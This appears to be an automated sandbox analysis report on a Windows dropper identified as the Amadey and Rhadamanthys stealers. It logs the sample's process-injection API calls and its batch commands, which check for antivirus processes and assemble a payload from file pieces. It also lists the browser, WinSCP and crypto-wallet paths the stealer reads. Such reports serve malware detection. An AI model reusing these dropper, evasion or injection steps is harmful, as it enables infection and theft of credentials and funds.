Source: OpenWith.exe, 00000014.00000003.2378242743.000001BD776C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 00000014.00000003.2377146496.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink`
Source: dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000014.00000003.2330137003.000001BD7776A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMCIDevSymbol
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMaxClockSpeed

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

API call chain: ExitProcess graph end node

graph_0-3377

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00CFF00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

22_2_00CFF00A

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00D0D3E9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

22_2_00D0D3E9

Source: C:\Windows\SysWOW64\dialer.exe	Code function: 16_3_027E027F mov eax, dword ptr fs:[00000030h]	16_3_027E027F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D1B6E2 mov eax, dword ptr fs:[00000030h]	22_2_00D1B6E2
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D1797B mov eax, dword ptr fs:[00000030h]	22_2_00D1797B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A8B6E2 mov eax, dword ptr fs:[00000030h]	23_2_00A8B6E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A8797B mov eax, dword ptr fs:[00000030h]	23_2_00A8797B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A8B6E2 mov eax, dword ptr fs:[00000030h]	24_2_00A8B6E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A8797B mov eax, dword ptr fs:[00000030h]	24_2_00A8797B

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00D20243 GetProcessHeap,

22_2_00D20243

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	Code function: 20_2_000001BD75701A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,	20_2_000001BD75701A90
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CFE63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00CFE63C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CFF00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00CFF00A
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CFF16F SetUnhandledExceptionFilter,	22_2_00CFF16F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D17EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00D17EFE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A6E63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00A6E63C
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A6F00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00A6F00A
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A6F16F SetUnhandledExceptionFilter,	23_2_00A6F16F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A87EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00A87EFE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A6F00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00A6F00A
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A6F16F SetUnhandledExceptionFilter,	24_2_00A6F16F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A6E63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00A6E63C
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A87EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00A87EFE

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00CE74F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

22_2_00CE74F0

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"	Jump to behavior

Source: Pleasure.pif, 0000000A.00000000.1724748135.0000000000206000.00000002.00000001.01000000.00000006.sdmp, Cocks.0.dr, Pleasure.pif.1.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00CFF1F6 cpuid

22_2_00CFF1F6

Source: C:\Windows\System32\OpenWith.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B637F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,

20_3_00007DF4B637F83C

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00CEB385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,

22_2_00CEB385

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00CEB2B0 GetUserNameA,

22_2_00CEB2B0

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

Code function: 22_2_00D23B1A _free,GetTimeZoneInformation,

22_2_00D23B1A

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

0_2_0040352D

Source: C:\Windows\System32\OpenWith.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 20.3.OpenWith.exe.1bd77981c18.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Yuem.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.Yuem.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.OpenWith.exe.1bd779c0438.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.OpenWith.exe.1bd779c0438.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.OpenWith.exe.1bd779627f8.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.2745389510.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2520663901.000001BD779C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2518352508.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.2522186450.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2755905464.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2518526497.000001BD7793B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2522953680.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2552580820.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.2538475835.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, type: DROPPED

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: !CP:Defichain-Electrum
Source: OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 00000014.00000003.2385145930.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000014.00000003.2387934347.000001BD7776B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
